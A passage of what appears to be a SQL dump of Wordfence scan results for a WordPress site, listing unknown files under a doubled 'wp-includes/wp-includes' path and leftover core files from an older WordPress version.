href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/SimplePie/Misc.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33633,1631564675,1631564675,'new','knownfile',75,'4950dd89d27c1893e0fdc0300a1678fe','109391d2a3f99d84d21bcb3bc375055c','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Net/IPv6.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/SimplePie/Net/IPv6.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33634,1631564675,1631564675,'new','knownfile',75,'d10582cd4812ebdf423cdab2e4b2fc00','42505967ca698065fc2ea67cb305171c','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Parse/Date.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/SimplePie/Parse/Date.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33635,1631564675,1631564675,'new','knownfile',75,'92c289a8f4caf35bcd57f174b17527a9','31ea485e01471d65fd03a52ebd666dca','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Parser.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/SimplePie/Parser.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33636,1631564675,1631564675,'new','knownfile',75,'b661f0d1b27efbda467433236db62705','df5ab844c0666fc2d0feb22989cdaedb','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Rating.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/SimplePie/Rating.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33637,1631564675,1631564675,'new','knownfile',75,'54ee64668e548c15c66e3d2b23245d82','41bf0a4677238158f594716026240249','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Registry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/SimplePie/Registry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33638,1631564675,1631564675,'new','knownfile',75,'d806a80d9c3c7f04d5bda58d3f31ae75','a3ef09a3e472167b8e9b6b80dbeee1ba','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Restriction.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/SimplePie/Restriction.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33639,1631564675,1631564675,'new','knownfile',75,'6dc09f3c9becf839ad1383d62c9c22ad','9177b8a2a461240fc303fcfdba2a9252','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Sanitize.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/SimplePie/Sanitize.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33640,1631564675,1631564675,'new','knownfile',75,'1c7a15f723dbf2b913d3c1707c403c90','0a2ccfb256f45458024cc8456cec6cee','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/Source.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/SimplePie/Source.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33641,1631564675,1631564675,'new','knownfile',75,'57df1f33895a0729716c688636fc140d','3ced1a6cbebc33a29569552c284ff305','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/XML/Declaration/Parser.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/SimplePie/XML/Declaration/Parser.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33642,1631564675,1631564675,'new','knownfile',75,'ddf0e99b1fc414d14cddbbc17f7fdc8e','1f940f1a2d8d1cd53df357c2e4f73474','Unknown file in WordPress core: wp-includes/wp-includes/SimplePie/gzdecode.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/SimplePie/gzdecode.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33643,1631564675,1631564675,'new','knownfile',75,'0057ed563870fa6e96482e84b55729c6','ba3a7a1aa19a6bdecdb06785af8f088d','Unknown file in WordPress core: wp-includes/wp-includes/Text/Diff/Engine/native.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/Text/Diff/Engine/native.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33644,1631564675,1631564675,'new','knownfile',75,'265961a9b99d39f6fa23e35f0ed6b884','c997ae17012bba6774ef662adae6635a','Unknown file in WordPress core: wp-includes/wp-includes/Text/Diff/Engine/shell.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/Text/Diff/Engine/shell.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33645,1631564675,1631564675,'new','knownfile',75,'cf37aea025e3db3a7827a0aaad693b76','f36b0553ed95bb1742438a34931e83fb','Unknown file in WordPress core: wp-includes/wp-includes/Text/Diff/Engine/string.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/Text/Diff/Engine/string.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33646,1631564675,1631564675,'new','knownfile',75,'8d4d746967322756499d77d7ca043516','9f461b5e2ba3e3ea5ce4a8fa7f686037','Unknown file in WordPress core: wp-includes/wp-includes/Text/Diff/Engine/xdiff.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/Text/Diff/Engine/xdiff.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33647,1631564675,1631564675,'new','knownfile',75,'2026414c0012cb5c26e698f78795eac6','f703c72b98664b228f08974a282018a5','Unknown file in WordPress core: wp-includes/wp-includes/Text/Diff/Renderer/inline.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/Text/Diff/Renderer/inline.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33648,1631564675,1631564675,'new','knownfile',75,'011dc4a667f18ab41c7f9d58adbedb61','b89d6b8ceab281b553e76c2ce245b9e1','Unknown file in WordPress core: wp-includes/wp-includes/Text/Diff/Renderer.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/Text/Diff/Renderer.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33649,1631564675,1631564675,'new','knownfile',75,'a95fc8d0c2c98cbb1e3f6499183831e1','114c81c04376d847cf939b5082458c56','Unknown file in WordPress core: wp-includes/wp-includes/Text/Diff.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/Text/Diff.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33650,1631564675,1631564675,'new','knownfile',75,'00c50ad8429ffde99c2291faca738e69','08a44d4ab826be8c950e6584ecc3c825','Unknown file in WordPress core: wp-includes/wp-includes/admin-bar.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:37:\"wp-includes/wp-includes/admin-bar.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33651,1631564675,1631564675,'new','knownfile',75,'3b46bc8bb33d1b1032329f894d52cf72','88c0390e71e7df00770b8c188e102f66','Unknown file in WordPress core: wp-includes/wp-includes/assets/script-loader-packages.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/assets/script-loader-packages.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33652,1631564675,1631564675,'new','knownfile',75,'d9caf0a40a083a40ed9885f758fc2db2','4ce7b5fbccdc4ea6508f019aaa2d4a6f','Unknown file in WordPress core: wp-includes/wp-includes/atomlib.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:35:\"wp-includes/wp-includes/atomlib.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33653,1631564675,1631564675,'new','knownfile',75,'4987a69b395890694811ce3276a7f711','cfe0f5beed63473331ce334269db9ba7','Unknown file in WordPress core: wp-includes/wp-includes/author-template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/author-template.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33654,1631564675,1631564675,'new','knownfile',25,'7a67fb7d62a2d140558937b4a40c8cb4','292f46dc736af71864f8c9d944f56e2b','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/heading-paragraph.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/block-patterns/heading-paragraph.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33655,1631564675,1631564675,'new','knownfile',25,'22ebc84c8bc70b67d5914c8ac70ca3a1','bae0f138baef6ec63fcf73ea2b33a96e','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/large-header-button.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/block-patterns/large-header-button.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33656,1631564675,1631564675,'new','knownfile',25,'62b8e209c00493300f47c8301affcc6d','e14d16c267099c3a27e0911fd3b99741','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/large-header.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/block-patterns/large-header.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33657,1631564675,1631564675,'new','knownfile',25,'236db4a0a931e0d0010459c6917b1393','4a3f9b236f50be45184599aa853414e7','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/quote.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/block-patterns/quote.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33658,1631564675,1631564675,'new','knownfile',25,'3c3ba027c1c86604b180b2acf41ac2a8','ccd6ca842052cae179251ed012e72b0b','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/text-three-columns-buttons.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/block-patterns/text-three-columns-buttons.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33659,1631564675,1631564675,'new','knownfile',25,'48b2c6ea393e45a44ed2e1e3449f834a','ff9dfec2cac24ff6e5c2e0e86d08c74e','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/text-two-columns-with-images.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/block-patterns/text-two-columns-with-images.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33660,1631564675,1631564675,'new','knownfile',25,'03b9293c9616b512a89eb5ca91840fa0','3a10a93f500c2254e5d386b4d3a320f3','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/text-two-columns.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/block-patterns/text-two-columns.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33661,1631564675,1631564675,'new','knownfile',25,'2a018cccd9ccfac90d901615fe9abc0a','4b41c9a15bdd1c0543302be060b13249','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/three-buttons.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/block-patterns/three-buttons.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33662,1631564675,1631564675,'new','knownfile',25,'747be7afd721d86fc25e80f84e649fd4','e028bf0f23586ea90a428071fb8b487b','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/two-buttons.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/block-patterns/two-buttons.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33663,1631564676,1631564676,'new','knownfile',25,'79ea84b434e3ccbbbf710472acd431b0','950b3ebe13ea253e980941b8264eec25','Old WordPress core file not removed during update: wp-includes/wp-includes/block-patterns/two-images.php','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/block-patterns/two-images.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33664,1631564676,1631564676,'new','knownfile',75,'db267161e88b434b6af28cbc799f2cee','3f00e183862298e1083fe0fe01ddb6a6','Unknown file in WordPress core: wp-includes/wp-includes/block-patterns.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/block-patterns.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33665,1631564676,1631564676,'new','knownfile',75,'bf1e782e9d1da548247850458b02d61e','3ac2a032f712b1faa833b42514d2598b','Unknown file in WordPress core: wp-includes/wp-includes/block-supports/align.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/block-supports/align.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33666,1631564676,1631564676,'new','knownfile',75,'ce60cb817e74ed86e7c8428d3a338f25','9aae5c506256ab28897fec572525a3ef','Unknown file in WordPress core: wp-includes/wp-includes/block-supports/colors.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/block-supports/colors.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33667,1631564676,1631564676,'new','knownfile',75,'ac45ec258bdd7f42376c0dfc5dfacf5f','13dd4cb9464bcf9f46d4da2d5b749c1e','Unknown file in WordPress core: wp-includes/wp-includes/block-supports/custom-classname.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/block-supports/custom-classname.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33668,1631564676,1631564676,'new','knownfile',75,'ab1c5c7bcf7556dbe28a56b3934d4d45','28b861d95f5856eb5f5f42dbfa9dda82','Unknown file in WordPress core: wp-includes/wp-includes/block-supports/generated-classname.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/block-supports/generated-classname.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33669,1631564676,1631564676,'new','knownfile',75,'85508953e62a9fa47148d0d28319c41e','cdad1169083bb93ab41a585817b0ee03','Unknown file in WordPress core: wp-includes/wp-includes/block-supports/typography.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/block-supports/typography.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33670,1631564676,1631564676,'new','knownfile',75,'31eefc730fdcc5f7c4ab4b9363f4d9f3','4abfc249cbcb342befe04a3c1762c283','Unknown file in WordPress core: wp-includes/wp-includes/blocks/archives/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/blocks/archives/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33671,1631564676,1631564676,'new','knownfile',75,'b8864dcfb3563c5ecadc483ce9a08f9a','b16554901e1afef5fda1714ff47add5b','Unknown file in WordPress core: wp-includes/wp-includes/blocks/archives.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/blocks/archives.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33672,1631564676,1631564676,'new','knownfile',75,'e2d0db66d703c9f8024b9503c8847a17','ab4d759c7a9e6dd7a79340c622e079e3','Unknown file in WordPress core: wp-includes/wp-includes/blocks/audio/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/audio/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33673,1631564676,1631564676,'new','knownfile',75,'bf797d5613a6faecb195c0c57327bddf','a75ce4f4e216f9acadc71f77886779aa','Unknown file in WordPress core: wp-includes/wp-includes/blocks/block/block.json','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/blocks/block/block.json\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33674,1631564676,1631564676,'new','knownfile',75,'b14a2baea5784c3d72543efe657ab438','0b3c1205a5ab9cd7b7fbbec0d305b7bc','Unknown file in WordPress core: wp-includes/wp-includes/blocks/block.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 